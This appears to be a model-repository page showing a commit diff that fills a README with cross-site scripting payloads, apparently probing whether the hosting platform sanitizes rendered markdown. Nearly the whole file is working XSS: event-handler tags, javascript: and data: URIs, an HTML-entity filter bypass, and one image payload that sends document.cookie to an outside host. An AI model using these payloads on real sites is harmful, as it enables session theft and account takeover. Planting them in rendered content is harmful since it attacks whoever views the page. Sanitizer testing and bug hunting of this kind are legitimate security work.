FIRSTACCOUNT69
/

test-hunt-2

Model card Files Files and versions

FIRSTACCOUNT69 commited on 4 days ago

Commit

f5139fc

·

verified ·

1 Parent(s): df27948

Add XSS test payloads

Files changed (1) hide show

README.md +58 -13

README.md CHANGED Viewed

@@ -1,26 +1,71 @@
 ---
-tags:
-- test
 license: mit
 ---
-# Test Model
-[Click me](javascript:alert(1))
-![img](x onerror=alert(1))
-<details><summary>Click</summary><img src=x onerror=alert(document.domain)></details>
-<iframe src="javascript:alert(1)">
-<a href="javascript:alert(1)">xss link</a>
-[link](data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==)
-<div onmouseover="alert(1)">Hover me</div>
-<svg onload="alert(1)">
-<math><mtext><table><mglyph><style><!--</style><img src=x onerror=alert(1)>
-<input onfocus=alert(1) autofocus>

 ---
 license: mit
 ---
+# XSS Test Model
+## Normal content first
+This is a test model with various XSS payloads embedded.
+## Test 1: Image onerror
+<img src=x onerror="fetch('https://xss.test/'+document.cookie)">
+## Test 2: SVG onload
+<svg onload="alert(1)">
+## Test 3: Details/Summary
+<details open ontoggle="alert('details')">
+<summary>Click</summary>
+test
+</details>
+## Test 4: Math tag
+<math><mi xlink:href="javascript:alert(1)">test</mi></math>
+## Test 5: Video
+<video src=x onerror="alert('video')">
+## Test 6: Marquee
+<marquee onstart="alert('marquee')">test</marquee>
+## Test 7: Input autofocus
+<input autofocus onfocus="alert('input')">
+## Test 8: Body
+<body onload="alert('body')">
+## Test 9: iframe srcdoc
+<iframe srcdoc="<script>alert('iframe')</script>">
+## Test 10: Object data
+<object data="javascript:alert('object')">
+## Test 11: Link tag
+<link rel="import" href="data:text/html,<script>alert('link')</script>">
+## Test 12: Style injection
+<div style="background:url('javascript:alert(1)')">styled</div>
+## Test 13: Custom element
+<custom-tag onmouseover="alert('custom')">hover me</custom-tag>
+## Test 14: Anchor with JS
+[Click me](javascript:alert('anchor'))
+## Test 15: Markdown image with JS
+![alt](javascript:alert('mdimg'))
+## Test 16: HTML entity bypass
+<img src=x onerror=&#97;&#108;&#101;&#114;&#116;(1)>
+## Test 17: Data URI
+<a href="data:text/html,<script>alert(1)</script>">data uri</a>
+## Test 18: Form action
+<form action="javascript:alert('form')"><button>Submit</button></form>
+## Test 19: Meta refresh
+<meta http-equiv="refresh" content="0;url=javascript:alert('meta')">
+## Test 20: Template
+<template><script>alert('template')</script></template>